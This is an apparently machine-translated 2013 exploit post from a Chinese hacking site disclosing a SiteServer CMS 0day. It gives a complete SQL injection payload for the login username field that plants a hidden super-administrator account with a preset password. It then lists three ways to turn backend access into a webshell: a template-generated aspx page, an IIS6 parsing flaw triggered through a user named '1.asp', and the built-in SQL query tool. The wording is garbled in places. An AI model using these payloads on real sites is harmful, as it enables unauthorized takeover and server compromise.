SiteServer CMS 0Day-vulnerability warning-the black bar safety net

ID MYHACK58:62201336625
Type myhack58
Reporter 佚名
Modified 2013-01-08T00:00:00


After testing spike the latest of the 3. Version 5

stieserver official website:www. siteserver. cn


Direct access to the UserCenter/login. aspx

The username at the input:

1 2 3'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

Password is blank, enter the verification code after submission, either to the database to insert a username blue password for the lanhai super user.

After re-access backstage SiteServer/login. aspx with the insertion of the user login

Background get the webshell of three methods:


Site management-on display functions-template management-on the Add single page template-direct generate aspx


Member permissions-for adding user-on user name is: 1. asp

With just added 1. asp to login, go in after uploading a personal avatar, using IIS6 parsing vulnerabilities have webshell

(ps: the background to add the user does not verify whether it contains illegal characters


System Tools-on the utility-of the machine parameters view You can see the database type, name, WEB path

System Tools-Database Tools-on the SQL statement query This function do good, directly is equivalent to a Query Analyzer, what echoes are there, you can backup give the webshell, or the use of the sqlserver configuration improper direct XXOO in.